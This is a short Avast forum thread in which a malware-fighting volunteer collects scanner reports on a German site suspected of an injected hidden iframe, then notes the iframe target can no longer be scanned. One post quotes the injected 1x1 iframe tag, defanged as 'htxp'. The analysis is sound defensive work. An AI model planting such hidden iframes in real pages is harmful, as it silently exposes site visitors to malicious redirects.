Avast community forum
Home
Help
Search
Login
Register
Avast WEBforum
»
Other
»
Viruses and worms
(Moderators:
Maxx_original
,
misak
) »
Site only suspicious or with malicious iFrame?
« previous
next »
Print
Pages: [
1
]
Go Down
Author
Topic: Site only suspicious or with malicious iFrame? (Read 1372 times)
0 Members and 1 Guest are viewing this topic.
polonus
Avast Überevangelist
Probably Bot
Posts: 34051
malware fighter
Site only suspicious or with malicious iFrame?
«
on:
January 13, 2014, 05:38:27 PM »
See:
http://maldb.com/qm-basis.de/#
One flag:
https://www.virustotal.com/nl/url/201bdcefeffa482703dd93c0eb8403056b9c3f2dc7ee8ad72f98ca2c6993f455/analysis/1389629550/
See:
http://jsunpack.jeek.org/?report=e04606ab071fbc59d97b3758b973c946cd3559c1
Quttera gives as suspicious: /index.html
Severity: Suspicious
Reason: Detected hidden reference to external web resource. [What's this?]
Details: Detected hidden iframe tag to 'lfmonline.de'
Offset: 31540
Threat dump:
http://jsunpack.jeek.org/?report=5dd31bf18954a7cd9b12f8acfd6e7028e65904c8
File size[byte]: 103944
File type: HTML
MD5: B36908064C2952A50F4E39CE997433C3
Scan duration[sec]: 1.008000
S0 iFrame Check comes up as:
Suspicious
<iframe src="htxp://lfmonline.de/test/test.php" width="1" height="1" frameborder="0"></iframe>" bgcolor="#cccacc" lang=d
This is
http://labs.sucuri.net/db/malware/malware-entry-mwiframehd202
See:
http://jsunpack.jeek.org/?report=e5e66f4d34bc0f64b37b926a43880918126d3b82
Site has a general security risk as excessive headers warning and a clickjacking warning
CMS: microsoft word 10 - multiple vuln.:
http://msisac.cisecurity.org/advisories/2013/2013-097.cfm
Zscaler is clear about the detection:
http://zulu.zscaler.com/submission/show/90f2029a7e79506757ac22ed2cbebbb3-1389630235
Compare for other examples with same iFrame malcode:
http://killmalware.com/technolens.org/
&
http://urlquery.net/report.php?id=7108899
Has this SEO malware now been taken down? Google Safebrowsing is still blocking the redirect location: htxp://lfmonline.de/ etc.
polonus
«
Last Edit: January 13, 2014, 05:40:27 PM by polonus
»
Logged
Cybersecurity is more of an attitude than anything else. Avast Evangelists.
Use NoScript, a limited user account and a virtual machine and be safe(r)!
polonus
Avast Überevangelist
Probably Bot
Posts: 34051
malware fighter
Re: Site only suspicious or with malicious iFrame?
«
Reply #1 on:
January 13, 2014, 06:59:03 PM »
Cannot establish as for these results: Error Occured! For htxp://lfmonline.de/test/test.php
Error Reason:Forbidden
Redirected-to :
So we cannot scan this website.Please check and try again.
polonus
Logged
Cybersecurity is more of an attitude than anything else. Avast Evangelists.
Use NoScript, a limited user account and a virtual machine and be safe(r)!
Print
Pages: [
1
]
Go Up
« previous
next »
Avast WEBforum
»
Other
»
Viruses and worms
(Moderators:
Maxx_original
,
misak
) »
Site only suspicious or with malicious iFrame?